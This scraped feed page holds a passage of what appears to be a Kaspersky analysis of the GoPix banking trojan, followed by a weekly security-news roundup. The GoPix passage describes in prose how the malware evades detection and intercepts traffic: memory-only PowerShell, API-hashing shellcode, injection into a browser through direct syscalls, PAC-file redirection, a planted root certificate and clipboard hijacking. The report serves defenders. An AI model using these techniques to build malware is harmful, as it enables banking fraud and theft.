script Encrypted PowerShell script ps Malicious code implant sc containing encrypted GoPix dropper shellcode, GoPix dropper, main payload shellcode and main GoPix implant GoPix configuration file pf Once these files are saved, an additional batch file is also created and executed. Its purpose is to launch the obfuscated PowerShell script. Obfuscated PowerShell script Upon execution, the obfuscated PowerShell script decrypts the encrypted PowerShell script ps, starts another PowerShell instance, and passes the decrypted script through its stdin, so that the decrypted script is never loaded to disk. Decrypted PowerShell script “ps” The purpose of this memory-only PowerShell script is to perform an in-memory decryption of the GoPix dropper shellcode, GoPix dropper, main payload shellcode and main GoPix malware implant into allocated memory. After that, it creates a small piece of shellcode within the PowerShell process to jump to the GoPix dropper shellcode previously decrypted. The GoPix dropper shellcode is built for either the x86 or x64 architecture, depending on the victim’s computer. Shellcode This shellcode is bundled with the malware and stays in encrypted form on disk. It is utilized at two separate stages of the infection chain: first to launch the GoPix dropper and subsequently to execute the main GoPix malware. We’ve observed two versions of this shellcode. The main difference is the old one resolves API addresses by their names, while the latest one employs a hashing algorithm to determine the address of a given API. The API hash calculation begins by generating a hash for the DLL name, and this resulting hash is then used within the function name to compute the final API hash. The first time GoPix is dropped into memory through PowerShell, its structure is as follows: Memory dropper shellcode Memory dropper DLL Main payload shellcode Main payload DLL Both DLLs have their MZ signature erased, which helps to evade detection by memory dumping tools that scan for PE files in memory. GoPix dropper When the main function from the dropper is called, it verifies if it is running within an Explorer.exe process; if not, it will terminate. It then sequentially checks for installed browsers — Chrome, Firefox, Edge, and Opera — retrieving the full path of the first detected browser from the registry key SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths. A significant difference from previously analyzed droppers is that this version encrypts each string using a unique algorithm. After selecting the browser, the dropper uses direct syscalls to launch the chosen browser process in a suspended state. This allows it to inject the main GoPix shellcode and its parameters into the process. The injected shellcode is tasked with extracting and loading the main GoPix implant directly into memory, subsequently calling its exported main function. The parameters passed include the number 1, to trigger the main GoPix function, and the current Process ID, which is that of Explorer.exe. Main GoPix implant Clipboard stealing functionality Boleto bancário was added as one of the targets to the malware’s clipboard stealing and replacing feature. Boleto is a popular payment method in Brazil that functions similarly to an invoice, being the second most popular payment system in the country. It is a standardized document that includes important payment information such as the amount due, due date, and details of the payee. It features a typeable line, which is a sequence of numbers that can be entered in online banking applications to pay. This line is what GoPix targets with its functionality. An example of such a line is “23790.12345 60000.123456 78901.234567 8 76540000010000”. When GoPix detects a Pix or Boleto transaction, it simply sends this information to the C2. However, when a Bitcoin or Ethereum wallet is copied to the clipboard, the malware replaces the address with one belonging to the threat actor. Unique man-in-the-middle attack PAC (Proxy AutoConfig) files are nothing new; they’ve been used by Brazilian criminals for over two decades, but GoPix takes this to another level. While in the past, criminals used PAC files to redirect victims to a fake phishing page, the purpose of the PAC file in GoPix attacks is to manipulate the traffic while the user navigates the legitimate financial website. In order to hide which site GoPix wants to intercept, it uses a CRC32 algorithm in the host field of the PAC file. It is formatted on the fly using a pf configuration file: the items in it determine which proxy the victim will be redirected to. To hide its malicious proxy server, once a connection is opened to the proxy server, the malware enumerates all connections and finds the process that initiated it. It then takes the process executable name CRC32C checksum and compares it with a hardcoded list of browsers’ CRC checksums. If it doesn’t match a known browser, the malware simply terminates the connection. To uncover GoPix targets, we compiled a list of many Brazilian financial institution domains and subdomains, computed their CRC32 checksums, and compared them against GoPix hardcoded values. The table below shows each CRC32 and its target. HTTPS interception Since every communication is encrypted via HTTPS, GoPix bypasses this by injecting a trusted root certificate into the memory of a web browser while on the victim’s machine. This allows the attacker to sniff and even manipulate the victim’s traffic. We have found two certificates across GoPix samples, one that expired in January 2025 and another created in February 2025 that is set to expire in February 2027. Conclusion With the ability to load its memory-only implant that employs a malicious Proxy AutoConfig (PAC) file and an HTTP server to execute an unprecedented man-in-the-middle attack, GoPix is by far the most advanced banking Trojan of Brazilian origin. The injection of a trusted root certificate into the browser enhances its ability to intercept and manipulate sensitive financial data while maintaining its stealth profile, as the malicious certificate is not visible to operating system tools. Additionally, GoPix has expanded its clipboard monitoring capability by adding Boleto slips to its arsenal, which already includes Pix transactions and cryptowallets addresses. This is a sophisticated threat, with multiple layers of evasion, persistence, and functionality. The investigation into the malware’s shellcode, dropper, and main module uncovered intricate mechanisms, including process jumping to leverage specific functionalities across processes. This technique, combined with robust string encryption methods applied to both the dropper and main payload, indicates that the threat actor has gone to great lengths to hinder detection. Interestingly enough, attackers adopted the use of a legitimate commercial anti-fraud service to pre-qualify their targets, aiming to avoid sandboxes and security researchers’ investigations. Additionally, the persistence and cleanup mechanisms implemented by the malware enhance its durability during incident response efforts, with very short C2 lifespans. For further information on GoPix and all technical details, please contact [email protected]. Kaspersky’s products detect this threat as HEUR:Trojan-Banker.Win64.GoPix, Trojan.PowerShell.GoPix, and HEUR:Trojan-Banker.OLE2.GoPix. Indicators of compromise EB0B4E35A2BA442821E28D617DD2DAA2 – NSIS installer C64AE7C50394799CE02E97288A12FFF – ZIP archive with an LNK file D3A17CB4CDBA724A0021F5076B33A103 – Malware dropper 28C314ACC587F1EA5C5666E935DB716C – Main payload Malicious Certificate Thumbprint f110d0bd7f3bd1c7b276dc78154dd21eef953384 1b1f85b68e6c9fde709d975a186185c94c0faa51
securelist.comMar 16, 2026extracted
Week in review: Self-spreading npm malware hits developers, Cisco SD-WAN 0-day exploited since 2023
Week in review: Self-spreading npm malware hits developers, Cisco SD-WAN 0-day exploited since 2023 Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Identity verification systems are struggling with synthetic fraud Fake and expired IDs keep showing up in routine customer transactions, from alcohol purchases to credit card applications. The problem shows up most often in industries that depend on fast onboarding and remote transactions, where identity checks rely heavily on scanned documents and automated workflows. Enterprises are racing to secure agentic AI deployments AI assistants are tied into ticketing systems, source code repositories, chat platforms, and cloud dashboards across many enterprises. In some environments, these systems can open pull requests, query internal databases, book services, and trigger automated workflows with limited human involvement. The State of AI Security 2026 from Cisco places this level of access inside a growing pattern of AI-driven operations that connect directly to core business systems. The hidden security cost of treating labs like data centers In this Help Net Security interview, Rich Kellen, VP, CISO at IFF, explains why security teams should not treat OT labs like IT environments. He discusses how compromise can damage scientific integrity and create safety risks that backups cannot fix. AI is becoming part of everyday criminal workflows Underground forums include long threads about chatbots drafting phishing emails, generating code snippets, and coaching social engineering calls. A new study examined conversations captured between January 1, 2025 and July 31, 2025 across dozens of cybercrime forums to map how AI tools are entering day to day criminal operations. AI-driven DAST reduces manual setup and surfaces exploitable vulnerabilities In this Help Net Security interview, Joni Klippert, CEO at StackHawk, discusses what defines DAST coverage in 2026 and why scan completion does not equal security. She explains how AI-driven DAST testing automates attack surface discovery, supports business-logic testing in pre-production, and reduces the manual setup that has limited adoption. Klippert also describes how organizations can implement runtime testing without instrumenting production systems. Review: Digital Forensics, Investigation, and Response, 5th Edition Digital Forensics, Investigation, and Response, 5th Edition presents a structured survey of the digital forensics discipline. The book spans foundational principles, platform specific analysis, specialized branches, and incident response integration. Open-source security debt grows across commercial software Open source code sits inside nearly every commercial application, and development teams continue to add new dependencies. Black Duck’s 2026 Open Source Security and Risk Analysis Report data shows that nearly all audited codebases contain open source components, with average component counts rising sharply over the past year. The $19.5 million insider risk problem Routine employee activity across corporate systems carries an average annual cost of $19.5 million per organization. That figure comes from the 2026 Cost of Insider Risks Global Report, conducted by the Ponemon Institute and based on data from 354 organizations that experienced one or more material insider related incidents over the past year. Industrial networks continue to leak onto the internet Industrial operators continue to run remote access portals, building automation servers, and other operational technology services on public IP address ranges. Palo Alto Networks, Siemens, and Idaho National Laboratory describe the scope of that exposure in the Intelligence-Driven Active Defense Report 2026. DeVry University’s CISO on higher education cybersecurity risk In this Help Net Security interview, Fred Kwong, VP, CISO at DeVry University, outlines how the university balances academic openness with cyber risk. He describes how systems for students are separated from back end operations to limit exposure. Japanese chip-testing toolmaker Advantest suffers ransomware attack Japanese tech testing company Advantest has suffered a ransomware attack, the company confirmed last Thursday, after detecting unusual activity within its IT environment on February 15, 2026. Fake troubleshooting tip on ClawHub leads to infostealer infection A new malware delivery campaign has hit ClawHub, the official online repository for “skills” that augment the capabilities of the popular OpenClaw AI agent. Unlike previous ones, this campaign does not aim to trick users into downloading a bogus, malicious skill. Self-spreading npm malware targets developers in new supply chain attack Security researchers have uncovered another supply chain attack targeting developers: 19 typosquatting npm packages published on npmjs.com that steal credentials, infect projects, and propagate themselves across developer environments. CISA flags exploited FileZen command injection bug, patch now! (CVE-2026-25108) CISA has added CVE-2026-25108, an OS command injection vulnerability in Soliton Systems’ FileZen secure file transfer solution, to its Known Exploited Vulnerabilities (KEV) catalog. The vendor has confirmed active exploitation, stating it has received multiple reports of damage caused by attackers abusing the flaw. SolarWinds Serv-U hit by four critical RCE-level vulnerabilities SolarWinds has fixed four critical vulnerabilities in its popular Serv-U file transfer solution, which is used by businesses and organizations of all sizes. If exploited, the flaws may allow attackers to create a system admin user and/or execute code as a privileged account. Threat actor leveraged Cisco SD-WAN zero-day since 2023 (CVE-2026-20127) A “highly sophisticated” cyber threat actor has been exploiting a zero-day authentication bypass vulnerability (CVE-2026-20127) in Cisco Catalyst SD-WAN Controller (formerly vSmart) and Cisco Catalyst SD-WAN Manager (formerly SD-WAN vManage), Cisco has announced. Scattered Lapsus$ Hunters seeks women for vishing attacks The Scattered Lapsus$ Hunters (SLH) hacking collective has launched a recruitment push aimed specifically at women, offering cash payments for participating in voice-phishing (vishing) attacks. A few days ago, threat intelligence firm Dataminr detected posts on a public Telegram channel advertising roles for female callers willing to conduct social-engineering phone operations. IronCurtain: An open-source, safeguard layer for autonomous AI assistants Veteran security engineer Niels Provos is working on a new technical approach designed to stop autonomous AI agents from taking actions you haven’t specifically authorized. Why SOCs are moving toward autonomous security operations in 2026 The modern security operations center faces a crisis of scale that human effort cannot fix. With alert volumes exponentially growing and threat actors automating their attacks, organizations must pivot to autonomous SOC strategies. This shift to AI-driven defense is the only way to survive the operational realities of 2026. Binding Operational Directive 26-02 sets deadlines for edge device replacement In this Help Net Security video, Jen Sovada, General Manager, Public Sector at Claroty, explains CISA’s Binding Operational Directive 26-02 and what it means for federal agencies. The directive requires agencies to inventory, report, decommission, and replace unsupported edge devices such as firewalls, routers, switches, load balancers, and wireless access points. Police seize 100,000 stolen Facebook credentials in cybercrime raid Officers from Poland’s Central Bureau for Combating Cybercrime (CBZC) dismantled an organized group that used phishing to seize Facebook accounts and extract BLIK payment codes from victims. Spanish police arrest suspected Anonymous members over DDoS attacks on government sites Spanish police (Guardia Civil) arrested four members of the hacktivist group Anonymous Fénix over DDoS attacks targeting ministries, political parties and public institutions. Police identified the organization’s leadership, including its administrator and moderator, who were arrested in May 2025 in Alcalá de Henares (Madrid) and Oviedo (Asturias). Security and complexity slow the next phase of enterprise AI agent adoption Enterprise AI agents are embedded in routine business processes, particularly inside engineering and IT operations. Many organizations report active production deployments, and agent development ranks high on strategic agendas. A new study from Docker, The State of Agentic AI Report, examines how enterprises are deploying agentic systems and the challenges emerging as deployments scale. Microsoft extends security patching for three Windows products at a price Support is ending for three Windows products released in 2016, with deadlines beginning in October 2026. Windows 10 Enterprise LTSB 2016 and Windows 10 IoT Enterprise 2016 LTSB will reach end of support on October 13, 2026, followed by Windows Server 2016 on January 12, 2027. International operation dismantles fraud network, €400,000 seized A coordinated international operation supported by Eurojust dismantled a fraudulent call centre operating from three offices and targeting citizens throughout Europe. Authorities arrested 11 suspects and seized more than €400,000 in cash. Teenagers charged over public bike service breach that exposed 4.62 million records Two South Korean teenagers have been charged in connection with a cyberattack that compromised the personal data of 4.62 million users of Seoul’s public bike service, Ttareungyi. The compromised data included user IDs, mobile phone numbers, addresses, dates of birth, gender, and weight. Airline brands become launchpads for phishing, crypto fraud Airline brands sit at the center of peak travel booking cycles, loyalty programs, and high value transactions. Criminal groups continue to register thousands of lookalike domains tied to these brands, targeting travelers, employees, and business partners. Recent threat intelligence from BforeAI’s PreCrime Labs identifies sustained impersonation activity across the global commercial airline sector. Cyber valuations climb as capital concentrates, AI security expands Venture funding in cybersecurity continued to concentrate in large private rounds at the end of 2025, driving valuations higher across stages. Data from DataTribe shows total capital invested approached $150 billion for the year, with a disproportionate share flowing into fewer than 100 deals. Ex-L3Harris executive sentenced to 87 months for selling stolen cyber-exploit trade secrets Peter Williams, a former executive of Trenchant, L3Harris’ cyber division, has been sentenced to 87 months in prison by a federal judge in Washington, D.C., after pleading guilty to stealing and selling sensitive cyber-exploit trade secrets to a Russian broker. Anthropic’s Remote Control feature brings Claude Code to mobile devices Anthropic has introduced a new Claude Code feature called Remote Control, allowing developers to continue a local coding session from a phone, tablet, or any web browser. The feature is rolling out as a research preview to Max users. Samsung’s Galaxy S26 turns privacy into a visible and invisible feature The Samsung Galaxy S26 series is out, offering plenty of security features that protect personal data while providing users with transparency and control over how their information is used. The feature that grabbed the spotlight is the built-in Privacy Display on the Galaxy S26 Ultra model, designed to help keep on-screen activity out of view in public places. Telegram rises to top spot in job scam activity Encrypted messaging platforms are becoming a primary channel for Authorised Push Payment (APP) fraud, with Telegram representing a growing share of reported cases, according to the Revolut report. NATO greenlights iPhone and iPad for classified information handling Apple confirmed that the iPhone and iPad have been approved for use with classified information in NATO restricted environments. The devices will no longer require special software or settings to handle NATO restricted-level information. Microsoft taps ASUS and Dell for the Windows 365 Cloud PC strategy Microsoft is adding two new Windows 365 Cloud PC devices, the ASUS NUC 16 for Windows 365 and the Dell Pro Desktop for Windows 365, expanding hardware options for its cloud-based desktop service. Both devices are scheduled for release in the third quarter of 2026, with distribution varying by region and model. Meta tightens grip on scam advertisers Meta is stepping up the fight against scams on its platforms by filing multiple lawsuits targeting companies and individuals in Brazil, China, and Vietnam who used deceptive tactics to run scam ads. The company said it has taken technical enforcement actions in these cases, including suspending payment methods used in the scams, disabling accounts linked to those operations, and blocking domains associated with scam sites. Coroot: Open-source observability and APM tool Coroot is an open-source observability and application performance monitoring tool. The core software, published in Go and accompanied by companion repositories such as coroot-node-agent, focuses on collecting telemetry data across systems. It uses extended Berkeley Packet Filter (eBPF) technology to gather metrics and trace inter-service communications without manual instrumentation of application code. Perplexity AI lands on Samsung’s next Galaxy lineup Samsung will add Perplexity to its upcoming Galaxy S26 devices as part of its Galaxy AI multi-agent ecosystem expansion. Users will be able to access Perplexity through quick-access controls, such as pressing and holding the side button, or by using the voice wake phrase “Hey, Plex.” WhatsApp is adding another lock to your account Meta has released WhatsApp Beta for Android 2.26.7.8 through the Google Play Beta Program. The update includes references to password-protected accounts, indicating plans to introduce an additional layer of protection beyond the app’s current authentication options. Windows 365 for Agents brings managed cloud PCs to autonomous workflows Microsoft’s Windows 365 for Agents is a cloud platform that gives AI agents secure access to cloud PCs. It lets builders run copilots, agents, and automated workflows in Windows environments without managing infrastructure. The platform includes security, policy controls, scalability, and visibility so agents can browse websites, process data, and complete tasks inside a managed cloud PC. Microsoft expands Sovereign Cloud security with governance, local productivity and AI Microsoft expands Microsoft Sovereign Cloud with new disconnected and AI capabilities that help organizations run critical infrastructure, productivity services and large AI models inside sovereign boundaries while keeping governance and operational continuity across connected and disconnected environments. Edge systems take the brunt of internet-wide exploitation attempts Internet-facing VPNs, routers, and remote access services absorbed sustained exploitation attempts throughout the second half of 2025, with nearly 3 billion malicious sessions recorded over 162 days. The concentration on edge infrastructure aligns with how attackers pursue initial access across the public internet. Microsoft adds domain libraries and Copilot integration to the quantum development kit The Microsoft Quantum Development Kit (QDK) is an open-source toolkit that runs on laptops and in common development environments. It includes code, simulators, libraries, and workflows that work with Visual Studio Code and GitHub Copilot. Integration with these tools gives developers features for writing, testing, debugging, and submitting quantum code. Apple blocks 18+ app downloads in select markets Apple has introduced expanded age assurance tools to help developers comply with regulations taking effect in Brazil, Australia, Singapore, Utah, and Louisiana. The updates, available in beta, expand the Declared Age Range API and related App Store systems. Reddit fined $19.5 million for failing to protect children’s personal data The UK’s Information Commissioner’s Office (ICO) has fined Reddit $19.5 million after finding that the company failed to use children’s personal information lawfully, exposing them to inappropriate and harmful content. Hottest cybersecurity open-source tools of the month: February 2026 This month’s roundup features exceptional open-source cybersecurity tools that are gaining attention for strengthening security across various environments. Wireshark 4.6.4 resolves dissector flaws, plugin compatibility issue Packet inspection remains a routine activity across enterprise networks, incident response workflows, and malware investigations. Continuous use places long-term stability and parsing accuracy at the center of daily operations. Wireshark version 4.6.4 addresses two vulnerabilities affecting protocol dissectors and resolves a plugin compatibility issue within the 4.6 release series. Fraudsters integrate ChatGPT into global scam campaigns AI models are being folded into fraud and influence operations that follow long standing tactics. A February 2026 update to OpenAI’s Disrupting Malicious Uses of Our Models report details how ChatGPT and related API access were used in romance scams, fake legal services, coordinated influence campaigns, and a state linked harassment effort. AWS Security Hub Extended brings enterprise security under one roof AWS Security Hub Extended is a plan within Security Hub that simplifies how customers procure, deploy, and integrate a full-stack enterprise security solution across endpoint, identity, email, network, data, browser, cloud, AI, and security operations. The CISO role keeps getting heavier Personal liability is becoming a routine part of the CISO job. In Splunk’s 2026 CISO Report, titled From Risk to Resilience in the AI Era, 78% of CISOs said they are concerned about their own liability for security incidents, up from 56% last year. The role carries personal exposure alongside operational accountability, and that shift is influencing how security leaders approach risk, documentation, and board communication. Android app uses Bluetooth signals to detect nearby smart glasses Smart glasses with built-in cameras are showing up in more public spaces, and a growing number of people want a way to know when one is nearby. An Android app called Nearby Glasses, developed by Yves Jeanrenaud, attempts to fill that gap by scanning Bluetooth Low Energy traffic for manufacturer identifiers associated with known smart glasses makers. Ransomware activity peaks outside business hours Intrusions continue to center on credential access and timed execution outside standard business hours. The Sophos Active Adversary Report 2026 analyzes 661 incident response and managed detection and response cases handled between November 1, 2024 and October 31, 2025, spanning organizations in 70 countries. Android 17 second beta expands privacy controls for contacts, SMS and local networks Google’s second beta of Android 17 continues updates to platform behavior and introduces new APIs focused on protecting sensitive data. Europol goes after The Com’s ransomware and extortion networks Law enforcement agencies across 28 countries have spent the past year building cases against a loosely organized collective known as The Com, a decentralized network of mostly teenagers and young adults linked to high-profile ransomware attacks, financial extortion, and the coercion of vulnerable children. Cybersecurity jobs available right now: February 24, 2026 We’ve scoured the market to bring you a selection of roles that span various skill levels within the cybersecurity field. Check out this weekly selection of cybersecurity jobs available right now. New infosec products of the month: February 2026 Here’s a look at the most interesting products from the past month, featuring releases from Aikido Security, Avast, Armis, Black Duck, Compliance Scorecard, Fingerprint, Gremlin, Impart Security, Portnox, Redpanda, Socure, SpecterOps, Veza, and Virtana.
helpnetsecurity.comMar 1, 2026extracted
Loading 25 more…